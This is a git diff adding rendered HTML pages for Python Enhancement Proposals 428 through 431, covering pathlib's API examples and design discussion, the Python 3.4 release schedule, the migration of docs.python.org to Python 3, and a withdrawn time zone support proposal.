  • +
+
+
+

Construction

+

We will present construction and joining together since they expose +similar semantics.

+

The simplest way to construct a path is to pass it its string representation:

+
>>> PurePath('setup.py')
+PurePosixPath('setup.py')
+
+
+

Extraneous path separators and "." components are eliminated:

+
>>> PurePath('a///b/c/./d/')
+PurePosixPath('a/b/c/d')
+
+
+

If you pass several arguments, they will be automatically joined:

+
>>> PurePath('docs', 'Makefile')
+PurePosixPath('docs/Makefile')
+
+
+

Joining semantics are similar to os.path.join, in that anchored paths ignore +the information from the previously joined components:

+
>>> PurePath('/etc', '/usr', 'bin')
+PurePosixPath('/usr/bin')
+
+
+

However, with Windows paths, the drive is retained as necessary:

+
>>> PureWindowsPath('c:/foo', '/Windows')
+PureWindowsPath('c:/Windows')
+>>> PureWindowsPath('c:/foo', 'd:')
+PureWindowsPath('d:')
+
+
+

Also, path separators are normalized to the platform default:

+
>>> PureWindowsPath('a/b') == PureWindowsPath('a\\b')
+True
+
+
+

Extraneous path separators and "." components are eliminated, but not +".." components:

+
>>> PurePosixPath('a//b/./c/')
+PurePosixPath('a/b/c')
+>>> PurePosixPath('a/../b')
+PurePosixPath('a/../b')
+
+
+

Multiple leading slashes are treated differently depending on the path +flavour. They are always retained on Windows paths (because of the UNC +notation):

+
>>> PureWindowsPath('//some/path')
+PureWindowsPath('//some/path/')
+
+
+

On POSIX, they are collapsed except if there are exactly two leading slashes, +which is a special case in the POSIX specification on pathname resolution +(this is also necessary for Cygwin compatibility):

+
>>> PurePosixPath('///some/path')
+PurePosixPath('/some/path')
+>>> PurePosixPath('//some/path')
+PurePosixPath('//some/path')
+
+
+

Calling the constructor without any argument creates a path object pointing +to the logical “current directory” (without looking up its absolute path, +which is the job of the cwd() classmethod on concrete paths):

+
>>> PurePosixPath()
+PurePosixPath('.')
+
+
+
+
+

Representing

+

To represent a path (e.g. to pass it to third-party libraries), just call +str() on it:

+
>>> p = PurePath('/home/antoine/pathlib/setup.py')
+>>> str(p)
+'/home/antoine/pathlib/setup.py'
+>>> p = PureWindowsPath('c:/windows')
+>>> str(p)
+'c:\\windows'
+
+
+

To force the string representation with forward slashes, use the as_posix() +method:

+
>>> p.as_posix()
+'c:/windows'
+
+
+

To get the bytes representation (which might be useful under Unix systems), +call bytes() on it, which internally uses os.fsencode():

+
>>> bytes(p)
+b'/home/antoine/pathlib/setup.py'
+
+
+

To represent the path as a file: URI, call the as_uri() method:

+
>>> p = PurePosixPath('/etc/passwd')
+>>> p.as_uri()
+'file:///etc/passwd'
+>>> p = PureWindowsPath('c:/Windows')
+>>> p.as_uri()
+'file:///c:/Windows'
+
+
+

The repr() of a path always uses forward slashes, even under Windows, for +readability and to remind users that forward slashes are ok:

+
>>> p = PureWindowsPath('c:/Windows')
+>>> p
+PureWindowsPath('c:/Windows')
+
+
+
+
+

Properties

+

Several simple properties are provided on every path (each can be empty):

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.drive
+'c:'
+>>> p.root
+'\\'
+>>> p.anchor
+'c:\\'
+>>> p.name
+'pathlib.tar.gz'
+>>> p.stem
+'pathlib.tar'
+>>> p.suffix
+'.gz'
+>>> p.suffixes
+['.tar', '.gz']
+
+
+
+
+

Deriving new paths

+
+

Joining

+

A path can be joined with another using the / operator:

+
>>> p = PurePosixPath('foo')
+>>> p / 'bar'
+PurePosixPath('foo/bar')
+>>> p / PurePosixPath('bar')
+PurePosixPath('foo/bar')
+>>> 'bar' / p
+PurePosixPath('bar/foo')
+
+
+

As with the constructor, multiple path components can be specified, either +collapsed or separately:

+
>>> p / 'bar/xyzzy'
+PurePosixPath('foo/bar/xyzzy')
+>>> p / 'bar' / 'xyzzy'
+PurePosixPath('foo/bar/xyzzy')
+
+
+

A joinpath() method is also provided, with the same behaviour:

+
>>> p.joinpath('Python')
+PurePosixPath('foo/Python')
+
+
+
+
+

Changing the path’s final component

+

The with_name() method returns a new path, with the name changed:

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.with_name('setup.py')
+PureWindowsPath('c:/Downloads/setup.py')
+
+
+

It fails with a ValueError if the path doesn’t have an actual name:

+
>>> p = PureWindowsPath('c:/')
+>>> p.with_name('setup.py')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "pathlib.py", line 875, in with_name
+    raise ValueError("%r has an empty name" % (self,))
+ValueError: PureWindowsPath('c:/') has an empty name
+>>> p.name
+''
+
+
+

The with_suffix() method returns a new path with the suffix changed. +However, if the path has no suffix, the new suffix is added:

+
>>> p = PureWindowsPath('c:/Downloads/pathlib.tar.gz')
+>>> p.with_suffix('.bz2')
+PureWindowsPath('c:/Downloads/pathlib.tar.bz2')
+>>> p = PureWindowsPath('README')
+>>> p.with_suffix('.bz2')
+PureWindowsPath('README.bz2')
+
+
+
+
+

Making the path relative

+

The relative_to() method computes the relative difference of a path to +another:

+
>>> PurePosixPath('/usr/bin/python').relative_to('/usr')
+PurePosixPath('bin/python')
+
+
+

ValueError is raised if the method cannot return a meaningful value:

+
>>> PurePosixPath('/usr/bin/python').relative_to('/etc')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "pathlib.py", line 926, in relative_to
+    .format(str(self), str(formatted)))
+ValueError: '/usr/bin/python' does not start with '/etc'
+
+
+
+
+
+

Sequence-like access

+

The parts property returns a tuple providing read-only sequence access +to a path’s components:

+
>>> p = PurePosixPath('/etc/init.d')
+>>> p.parts
+('/', 'etc', 'init.d')
+
+
+

Windows paths handle the drive and the root as a single path component:

+
>>> p = PureWindowsPath('c:/setup.py')
+>>> p.parts
+('c:\\', 'setup.py')
+
+
+

(separating them would be wrong, since C: is not the parent of C:\\).

+

The parent property returns the logical parent of the path:

+
>>> p = PureWindowsPath('c:/python33/bin/python.exe')
+>>> p.parent
+PureWindowsPath('c:/python33/bin')
+
+
+

The parents property returns an immutable sequence of the path’s +logical ancestors:

+
>>> p = PureWindowsPath('c:/python33/bin/python.exe')
+>>> len(p.parents)
+3
+>>> p.parents[0]
+PureWindowsPath('c:/python33/bin')
+>>> p.parents[1]
+PureWindowsPath('c:/python33')
+>>> p.parents[2]
+PureWindowsPath('c:/')
+
+
+
+
+

Querying

+

is_relative() returns True if the path is relative (see definition +above), False otherwise.

+

is_reserved() returns True if a Windows path is a reserved path such +as CON or NUL. It always returns False for POSIX paths.

+

match() matches the path against a glob pattern. It operates on +individual parts and matches from the right:

+
>>> p = PurePosixPath('/usr/bin')
+>>> p.match('/usr/b*')
+True
+>>> p.match('usr/b*')
+True
+>>> p.match('b*')
+True
+>>> p.match('/u*')
+False
+
+
+

This behaviour respects the following expectations:

+
    +
  • A simple pattern such as “*.py” matches arbitrarily long paths as long +as the last part matches, e.g. “/usr/foo/bar.py”.
  • +
  • Longer patterns can be used as well for more complex matching, e.g. +“/usr/foo/*.py” matches “/usr/foo/bar.py”.
  • +
+
+
+
+

Concrete paths API

+

In addition to the operations of the pure API, concrete paths provide +additional methods which actually access the filesystem to query or mutate +information.

+
+

Constructing

+

The classmethod cwd() creates a path object pointing to the current +working directory in absolute form:

+
>>> Path.cwd()
+PosixPath('/home/antoine/pathlib')
+
+
+
+
+

File metadata

+

The stat() returns the file’s stat() result; similarly, lstat() +returns the file’s lstat() result (which is different iff the file is a +symbolic link):

+
>>> p.stat()
+posix.stat_result(st_mode=33277, st_ino=7483155, st_dev=2053, st_nlink=1, st_uid=500, st_gid=500, st_size=928, st_atime=1343597970, st_mtime=1328287308, st_ctime=1343597964)
+
+
+

Higher-level methods help examine the kind of the file:

+
>>> p.exists()
+True
+>>> p.is_file()
+True
+>>> p.is_dir()
+False
+>>> p.is_symlink()
+False
+>>> p.is_socket()
+False
+>>> p.is_fifo()
+False
+>>> p.is_block_device()
+False
+>>> p.is_char_device()
+False
+
+
+

The file owner and group names (rather than numeric ids) are queried +through corresponding methods:

+
>>> p = Path('/etc/shadow')
+>>> p.owner()
+'root'
+>>> p.group()
+'shadow'
+
+
+
+
+

Path resolution

+

The resolve() method makes a path absolute, resolving any symlink on +the way (like the POSIX realpath() call). It is the only operation which +will remove “..” path components. On Windows, this method will also +take care to return the canonical path (with the right casing).

+
+
+

Directory walking

+

Simple (non-recursive) directory access is done by calling the iterdir() +method, which returns an iterator over the child paths:

+
>>> p = Path('docs')
+>>> for child in p.iterdir(): child
+...
+PosixPath('docs/conf.py')
+PosixPath('docs/_templates')
+PosixPath('docs/make.bat')
+PosixPath('docs/index.rst')
+PosixPath('docs/_build')
+PosixPath('docs/_static')
+PosixPath('docs/Makefile')
+
+
+

This allows simple filtering through list comprehensions:

+
>>> p = Path('.')
+>>> [child for child in p.iterdir() if child.is_dir()]
+[PosixPath('.hg'), PosixPath('docs'), PosixPath('dist'), PosixPath('__pycache__'), PosixPath('build')]
+
+
+

Simple and recursive globbing is also provided:

+
>>> for child in p.glob('**/*.py'): child
+...
+PosixPath('test_pathlib.py')
+PosixPath('setup.py')
+PosixPath('pathlib.py')
+PosixPath('docs/conf.py')
+PosixPath('build/lib/pathlib.py')
+
+
+
+
+

File opening

+

The open() method provides a file opening API similar to the builtin +open() method:

+
>>> p = Path('setup.py')
+>>> with p.open() as f: f.readline()
+...
+'#!/usr/bin/env python3\n'
+
+
+
+
+

Filesystem modification

+

Several common filesystem operations are provided as methods: touch(), +mkdir(), rename(), replace(), unlink(), rmdir(), +chmod(), lchmod(), symlink_to(). More operations could be +provided, for example some of the functionality of the shutil module.

+

Detailed documentation of the proposed API can be found at the pathlib +docs.

+
+
+
+

Discussion

+
+

Division operator

+

The division operator came out first in a poll about the path joining +operator. Initial versions of pathlib used square brackets +(i.e. __getitem__) instead.

+
+
+

joinpath()

+

The joinpath() method was initially called join(), but several people +objected that it could be confused with str.join() which has different +semantics. Therefore, it was renamed to joinpath().

+
+
+

Case-sensitivity

+

Windows users consider filesystem paths to be case-insensitive and expect +path objects to observe that characteristic, even though in some rare +situations some foreign filesystem mounts may be case-sensitive under +Windows.

+

In the words of one commenter,

+
+
“If glob(”*.py”) failed to find SETUP.PY on Windows, that would be a +usability disaster”.

—Paul Moore in +https://mail.python.org/pipermail/python-dev/2013-April/125254.html

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0428.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0429/index.html b/pep-0429/index.html new file mode 100644 index 00000000000..4678c5342e6 --- /dev/null +++ b/pep-0429/index.html @@ -0,0 +1,220 @@ + + + + + + + + PEP 429 – Python 3.4 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 429 – Python 3.4 Release Schedule

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
17-Oct-2012
+
Python-Version:
+
3.4
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.4. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.4 Release Manager: Larry Hastings
  • +
  • Windows installers: Martin v. Löwis
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

Release Schedule

+

Python 3.4 has now reached its end-of-life and has been retired. +No more releases will be made.

+

These are all the historical releases of Python 3.4, +including their release dates.

+
    +
  • 3.4.0 alpha 1: August 3, 2013
  • +
  • 3.4.0 alpha 2: September 9, 2013
  • +
  • 3.4.0 alpha 3: September 29, 2013
  • +
  • 3.4.0 alpha 4: October 20, 2013
  • +
  • 3.4.0 beta 1: November 24, 2013
  • +
  • 3.4.0 beta 2: January 5, 2014
  • +
  • 3.4.0 beta 3: January 26, 2014
  • +
  • 3.4.0 candidate 1: February 10, 2014
  • +
  • 3.4.0 candidate 2: February 23, 2014
  • +
  • 3.4.0 candidate 3: March 9, 2014
  • +
  • 3.4.0 final: March 16, 2014
  • +
  • 3.4.1 candidate 1: May 5, 2014
  • +
  • 3.4.1 final: May 18, 2014
  • +
  • 3.4.2 candidate 1: September 22, 2014
  • +
  • 3.4.2 final: October 6, 2014
  • +
  • 3.4.3 candidate 1: February 8, 2015
  • +
  • 3.4.3 final: February 25, 2015
  • +
  • 3.4.4 candidate 1: December 6, 2015
  • +
  • 3.4.4 final: December 20, 2015
  • +
  • 3.4.5 candidate 1: June 12, 2016
  • +
  • 3.4.5 final: June 26, 2016
  • +
  • 3.4.6 candidate 1: January 2, 2017
  • +
  • 3.4.6 final: January 17, 2017
  • +
  • 3.4.7 candidate 1: July 25, 2017
  • +
  • 3.4.7 final: August 9, 2017
  • +
  • 3.4.8 candidate 1: January 23, 2018
  • +
  • 3.4.8 final: February 4, 2018
  • +
  • 3.4.9 candidate 1: July 19, 2018
  • +
  • 3.4.9 final: August 2, 2018
  • +
  • 3.4.10 candidate 1: March 4, 2019
  • +
  • 3.4.10 final: March 18, 2019
  • +
+
+
+

Features for 3.4

+

Implemented / Final PEPs:

+
    +
  • PEP 428, a “pathlib” module providing object-oriented filesystem paths
  • +
  • PEP 435, a standardized “enum” module
  • +
  • PEP 436, a build enhancement that will help generate introspection information for builtins
  • +
  • PEP 442, improved semantics for object finalization
  • +
  • PEP 443, adding single-dispatch generic functions to the standard library
  • +
  • PEP 445, a new C API for implementing custom memory allocators
  • +
  • PEP 446, changing file descriptors to not be inherited by default in subprocesses
  • +
  • PEP 450, a new “statistics” module
  • +
  • PEP 451, standardizing module metadata for Python’s module import system
  • +
  • PEP 453, a bundled installer for the pip package manager
  • +
  • PEP 454, a new “tracemalloc” module for tracing Python memory allocations
  • +
  • PEP 456, a new hash algorithm for Python strings and binary data
  • +
  • PEP 3154, a new and improved protocol for pickled objects
  • +
  • PEP 3156, a new “asyncio” module, a new framework for asynchronous I/O
  • +
+

Deferred to post-3.4:

+
    +
  • PEP 431, improved support for time zone databases
  • +
  • PEP 441, improved Python zip application support
  • +
  • PEP 447, support for __locallookup__ metaclass method
  • +
  • PEP 448, additional unpacking generalizations
  • +
  • PEP 455, key transforming dictionary
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0429.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0430/index.html b/pep-0430/index.html new file mode 100644 index 00000000000..285097217b6 --- /dev/null +++ b/pep-0430/index.html @@ -0,0 +1,334 @@ + + + + + + + + PEP 430 – Migrating to Python 3 as the default online documentation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 430 – Migrating to Python 3 as the default online documentation

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Georg Brandl
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
27-Oct-2012
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a strategy for migrating the default version of the +Python documentation presented to users of Python when accessing +docs.python.org from 2.7 to Python 3.3.

+

It proposes a backwards compatible scheme that preserves the meaning of +existing deep links in to the Python 2 documentation, while still +presenting the Python 3 documentation by default, and presenting the +Python 2 and 3 documentation in a way that avoids making the Python 3 +documentation look like a second-class citizen.

+
+
+

Background

+

With the transition of the overall Python ecosystem from Python 2 to Python 3 +still in progress, one question which arises periodically [1], [2] is when +and how to handle the change from providing the Python 2 documentation as +the default version displayed at the docs.python.org root URL to providing +the Python 3 documentation.

+
+
+

Key Concerns

+

There are a couple of key concerns that any migration proposal needs to +address.

+
+

Don’t Confuse Beginners

+

Many beginners learn Python through third party resources. These resources, +not all of which are online resources, may reference in to the python.org +online documentation for additional background and details.

+

Importantly, even when the online documentation is updated, the “version +added” and “version changed” tags usually provide enough information for +users to adjust appropriately for the specific version they are using.

+

While deep links in to the python.org documentation may occasionally break +within the Python 2 series, this is very rare.

+

Migrating to Python 3 is a very different matter. Many links would break due +to renames and removals, and the “version added” and “version changed” +information for the Python 2 series is completely absent.

+
+
+

Don’t Break Useful Resources

+

There are many useful Python resources out there, such as the mailing list +archives on python.org and question-and-answer sites like Stack Overflow, +where links are highly unlikely to be updated, no matter how much notice +is provided.

+

Old posts and answers to questions all currently link to docs.python.org +expecting to get the Python 2 documentation at unqualified URLs. Links from +answers that relate to Python 3 are explicitly qualified with /py3k/ in +the path component.

+
+
+
+

Proposal

+

This PEP (based on an idea originally put forward back in May [3]) is to +not migrate the Python 2 specific deep links at all, and instead adopt a +scheme where all URLs presented to users on docs.python.org are qualified +appropriately with the relevant release series.

+

Visitors to the root URL at http://docs.python.org will be automatically +redirected to http://docs.python.org/3/, but links deeper in +the version-specific hierarchy, such as to +http://docs.python.org/library/os, will instead be redirected to +a Python 2 specific link such as http://docs.python.org/2/library/os.

+

The specific subpaths which will be redirected to explicitly qualified +paths for the Python 2 docs are:

+
    +
  • /c-api/
  • +
  • /distutils/
  • +
  • /extending/
  • +
  • /faq/
  • +
  • /howto/
  • +
  • /library/
  • +
  • /reference/
  • +
  • /tutorial/
  • +
  • /using/
  • +
  • /whatsnew/
  • +
  • /about.html
  • +
  • /bugs.html
  • +
  • /contents.html
  • +
  • /copyright.html
  • +
  • /license.html
  • +
  • /genindex.html
  • +
  • /glossary.html
  • +
  • /py-modindex.html
  • +
  • /search.html
  • +
+

The existing /py3k/ subpath will be redirected to the new /3/ +subpath.

+
+

Presented URLs

+

With this scheme, the following URLs would be presented to users after +resolution of any aliasing and rewriting rules:

+
    +
  • http://docs.python.org/x/*
  • +
  • http://docs.python.org/x.y/*
  • +
  • http://docs.python.org/dev/*
  • +
  • http://docs.python.org/release/x.y.z/*
  • +
  • http://docs.python.org/devguide
  • +
+

The /x/ URLs mean “give me the latest documentation for a released +version in this release series”. It will draw the documentation from the +relevant maintenance branch in source control (this will always be the +2.7 branch for Python 2 and is currently 3.3 for Python 3). Differences +relative to previous versions in the release series will be available +through “version added” and “version changed” markers.

+

The /x.y/ URLs mean “give me the latest documentation for this release”. +It will draw the documentation from the relevant maintenance branch in +source control (or the default branch for the currently in development +version). It differs from the status quo in that the URLs will +actually remain available in the user’s browser for easy copy and pasting. +(Currently, references to specific versions that are not the latest in their +release series will resolve to a stable URL for a specific maintenance +version in the “release” hierarchy, while the current latest version in the +release series resolves to the release series URL. This makes it hard to get +a “latest version specific URL”, since it is always necessary to construct +them manually).

+

The /dev/ URL means the documentation for the default branch in source +control.

+

The /release/x.y.x/ URLs will refer to the documentation of those +releases, exactly as it was at the time of the release.

+

The developer’s guide is not version specific, and thus retains its own +stable /devguide/ URL.

+
+
+
+

Rationale

+

There is some desire to switch the unqualified references to mean Python 3 +as a sign of confidence in Python 3. Such a move would either break a lot of +things, or else involve an awful lot of work to avoid breaking things.

+

I believe we can get much the same effect without breaking the world by:

+
    +
  1. Deprecating the use of unqualified references to the online +documentation (while promising to preserve the meaning of such +references indefinitely)
  2. +
  3. Updating all python.org and python-dev controlled links to use +qualified references (excluding archived email)
  4. +
  5. Redirecting visitors to the root of http://docs.python.org to +http://docs.python.org/3.x
  6. +
+

Most importantly, because this scheme doesn’t alter the behaviour of any +existing deep links, it could be implemented with a significantly shorter +warning period than would be required for a scheme that risked breaking +deep links, or started to redirect unqualified links to Python 3. The +only part of the scheme which would require any warning at all is the +step of redirecting the “http://docs.python.org/” landing page to the +Python 3.3 documentation.

+

Namespaces are one honking great idea - let’s do more of those.

+

Note that the approach described in this PEP gives two ways to access the +content of the default branch: as /dev/ or using the appropriate +/x.y/ reference. This is deliberate, as the default branch is referenced +for two different purposes:

+
    +
  • to provide additional information when discussing an upcoming feature of +the next release (a /x.y/ URL is appropriate)
  • +
  • to provide a stable destination for developers to access the documentation +of the next feature release, regardless of the version (a /dev/ URL is +appropriate)
  • +
+
+
+

Implementation

+

The URLs on docs.python.org are controlled by the python.org infrastructure +team rather than through the CPython source repo, so acceptance and +implementation of the ideas in this PEP will be up to the team.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0430.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0431/index.html b/pep-0431/index.html new file mode 100644 index 00000000000..9a412c10260 --- /dev/null +++ b/pep-0431/index.html @@ -0,0 +1,436 @@ + + + + + + + + PEP 431 – Time zone support improvements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 431 – Time zone support improvements

+
+
Author:
+
Lennart Regebro <regebro at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2012
+
Post-History:
+
11-Dec-2012, 28-Dec-2012, 28-Jan-2013
+
Superseded-By:
+
615
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the implementation of concrete time zone support in the +Python standard library, and also improvements to the time zone API to deal +with ambiguous time specifications during DST changes.

+
+
+

Withdrawal

+

After lengthy discussion it has turned out that the things I thought was +problem in datetime’s implementation are intentional. Those include +completely ignoring DST transitions when making date time arithmetic. +That makes the is_dst flags part of this PEP pointless, as they would +have no useful function. datetime by design does not separate between +ambiguous datetimes and will never do so.

+

I therefore withdraw this PEP.

+

UPDATE: The PEP 615 “Support for the IANA Time Zone Database in the +Standard Library” added the zoneinfo module to Python 3.9 and +superseded this PEP.

+
+
+

Proposal

+
+

Concrete time zone support

+

The time zone support in Python has no concrete implementation in the +standard library outside of a tzinfo baseclass that supports fixed offsets. +To properly support time zones you need to include a database over all time +zones, both current and historical, including daylight saving changes. +But such information changes frequently, so even if we include the last +information in a Python release, that information would be outdated just a +few months later.

+

Time zone support has therefore only been available through two third-party +modules, pytz and dateutil, both who include and wrap the “zoneinfo” +database. This database, also called “tz” or “The Olsen database”, is the +de facto standard time zone database over time zones, and it is included in +most Unix and Unix-like operating systems, including OS X.

+

This gives us the opportunity to include the code that supports the zoneinfo +data in the standard library, but by default use the operating system’s copy +of the data, which typically will be kept updated by the updating mechanism +of the operating system or distribution.

+

For those who have an operating system that does not include the zoneinfo +database, for example Windows, the Python source distribution will include a +copy of the zoneinfo database, and a distribution containing the latest +zoneinfo database will also be available at the Python Package Index, so it +can be easily installed with the Python packaging tools such as +easy_install or pip. This could also be done on Unices that are no +longer receiving updates and therefore have an outdated database.

+

With such a mechanism Python would have full-time zone support in the +standard library on any platform, and a simple package installation would +provide an updated time zone database on those platforms where the zoneinfo +database isn’t included, such as Windows, or on platforms where OS updates +are no longer provided.

+

The time zone support will be implemented by making the datetime module +into a package, and adding time zone support to datetime based on Stuart +Bishop’s pytz module.

+
+
+

Getting the local time zone

+

On Unix there is no standard way of finding the name of the time zone that is +being used. All the information that is available is the time zone +abbreviations, such as EST and PDT, but many of those abbreviations +are ambiguous and therefore you can’t rely on them to figure out which time +zone you are located in.

+

There is however a standard for finding the compiled time zone information +since it’s located in /etc/localtime. Therefore, it is possible to create +a local time zone object with the correct time zone information even though +you don’t know the name of the time zone. A function in datetime should +be provided to return the local time zone.

+

The support for this will be made by integrating Lennart Regebro’s +tzlocal module into the new datetime module.

+

For Windows it will look up the local Windows time zone name, and use a +mapping between Windows time zone names and zoneinfo time zone names provided +by the Unicode consortium to convert that to a zoneinfo time zone.

+

The mapping should be updated before each major or bugfix release, scripts +for doing so will be provided in the Tools/ directory.

+
+
+

Ambiguous times

+

When changing over from daylight savings time (DST) the clock is turned back +one hour. This means that the times during that hour happens twice, once +with DST and then once without DST. Similarly, when changing to daylight +savings time, one hour goes missing.

+

The current time zone API can not differentiate between the two ambiguous +times during a change from DST. For example, in Stockholm the time of +2012-11-28 02:00:00 happens twice, both at UTC 2012-11-28 00:00:00 and also +at 2012-11-28 01:00:00.

+

The current time zone API can not disambiguate this and therefore it’s +unclear which time should be returned:

+
# This could be either 00:00 or 01:00 UTC:
+>>> dt = datetime(2012, 10, 28, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'))
+# But we can not specify which:
+>>> dt.astimezone(zoneinfo('UTC'))
+datetime.datetime(2012, 10, 28, 1, 0, tzinfo=<UTC>)
+
+
+

pytz solved this problem by adding is_dst parameters to several +methods of the tzinfo objects to make it possible to disambiguate times when +this is desired.

+

This PEP proposes to add these is_dst parameters to the relevant methods +of the datetime API, and therefore add this functionality directly to +datetime. This is likely the hardest part of this PEP as this involves +updating the C version of the datetime library with this functionality, +as this involved writing new code, and not just reorganizing existing +external libraries.

+
+
+
+

Implementation API

+
+

The zoneinfo database

+

The latest version of the zoneinfo database should exist in the +Lib/tzdata directory of the Python source control system. This copy of +the database should be updated before every Python feature and bug-fix +release, but not for releases of Python versions that are in +security-fix-only-mode.

+

Scripts to update the database will be provided in Tools/, and the +release instructions will be updated to include this update.

+

New configure options --enable-internal-timezone-database and +--disable-internal-timezone-database will be implemented to enable and +disable the installation of this database when installing from source. A +source install will default to installing them.

+

Binary installers for systems that have a system-provided zoneinfo database +may skip installing the included database since it would never be used for +these platforms. For other platforms, for example Windows, binary installers +must install the included database.

+
+
+

Changes in the datetime-module

+

The public API of the new time zone support contains one new class, one new +function, one new exception and four new collections. In addition to this, several +methods on the datetime object gets a new is_dst parameter.

+
+

New class dsttimezone

+

This class provides a concrete implementation of the tzinfo base +class that implements DST support.

+
+
+

New function zoneinfo(name=None, db_path=None)

+

This function takes a name string that must be a string specifying a +valid zoneinfo time zone, i.e. “US/Eastern”, “Europe/Warsaw” or “Etc/GMT”. +If not given, the local time zone will be looked up. If an invalid zone name +is given, or the local time zone can not be retrieved, the function raises +UnknownTimeZoneError.

+

The function also takes an optional path to the location of the zoneinfo +database which should be used. If not specified, the function will look for +databases in the following order:

+
    +
  1. Check if the tzdata-update module is installed, and then use that +database.
  2. +
  3. Use the database in /usr/share/zoneinfo, if it exists.
  4. +
  5. Use the Python-provided database in Lib/tzdata.
  6. +
+

If no database is found an UnknownTimeZoneError or subclass thereof will +be raised with a message explaining that no zoneinfo database can be found, +but that you can install one with the tzdata-update package.

+
+
+

New parameter is_dst

+

A new is_dst parameter is added to several methods to handle time +ambiguity during DST changeovers.

+
    +
  • tzinfo.utcoffset(dt, is_dst=False)
  • +
  • tzinfo.dst(dt, is_dst=False)
  • +
  • tzinfo.tzname(dt, is_dst=False)
  • +
  • datetime.astimezone(tz, is_dst=False)
  • +
+

The is_dst parameter can be False (default), True, or None.

+

False will specify that the given datetime should be interpreted as not +happening during daylight savings time, i.e. that the time specified is after +the change from DST. This is default to preserve existing behavior.

+

True will specify that the given datetime should be interpreted as happening +during daylight savings time, i.e. that the time specified is before the change +from DST.

+

None will raise an AmbiguousTimeError exception if the time specified +was during a DST change over. It will also raise a NonExistentTimeError +if a time is specified during the “missing time” in a change to DST.

+
+
+

New exceptions

+
    +
  • UnknownTimeZoneError

    This exception is a subclass of KeyError and raised when giving a time +zone specification that can’t be found:

    +
    >>> datetime.zoneinfo('Europe/New_York')
    +Traceback (most recent call last):
    +...
    +UnknownTimeZoneError: There is no time zone called 'Europe/New_York'
    +
    +
    +
  • +
  • InvalidTimeError

    This exception serves as a base for AmbiguousTimeError and +NonExistentTimeError, to enable you to trap these two separately. It +will subclass from ValueError, so that you can catch these errors together +with inputs like the 29th of February 2011.

    +
  • +
  • AmbiguousTimeError

    This exception is raised when giving a datetime specification that is ambiguous +while setting is_dst to None:

    +
    >>> datetime(2012, 11, 28, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'), is_dst=None)
    +>>>
    +Traceback (most recent call last):
    +...
    +AmbiguousTimeError: 2012-10-28 02:00:00 is ambiguous in time zone Europe/Stockholm
    +
    +
    +
  • +
  • NonExistentTimeError

    This exception is raised when giving a datetime specification for a time that due to +daylight saving does not exist, while setting is_dst to None:

    +
    >>> datetime(2012, 3, 25, 2, 0, tzinfo=zoneinfo('Europe/Stockholm'), is_dst=None)
    +>>>
    +Traceback (most recent call last):
    +...
    +NonExistentTimeError: 2012-03-25 02:00:00 does not exist in time zone Europe/Stockholm
    +
    +
    +
  • +
+
+
+

New collections

+
    +
  • all_timezones is the exhaustive list of the time zone names that can +be used, listed alphabetically.
  • +
  • common_timezones is a list of useful, current time zones, listed +alphabetically.
  • +
+
+
+
+

The tzdata-update-package

+

The zoneinfo database will be packaged for easy installation with +easy_install/pip/buildout. This package will not install any +Python code, and will not contain any Python code except that which is needed +for installation.

+

It will be kept updated with the same tools as the internal database, but +released whenever the zoneinfo-database is updated, and use the same +version schema.

+
+
+
+

Differences from the pytz API

+
    +
  • pytz has the functions localize() and normalize() to work +around that tzinfo doesn’t have is_dst. When is_dst is +implemented directly in datetime.tzinfo they are no longer needed.
  • +
  • The timezone() function is called zoneinfo() to avoid clashing with +the timezone class introduced in Python 3.2.
  • +
  • zoneinfo() will return the local time zone if called without arguments.
  • +
  • The class pytz.StaticTzInfo is there to provide the is_dst support for static +time zones. When is_dst support is included in datetime.tzinfo it is no longer needed.
  • +
  • InvalidTimeError subclasses from ValueError.
  • +
+
+
+

Resources

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0431.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
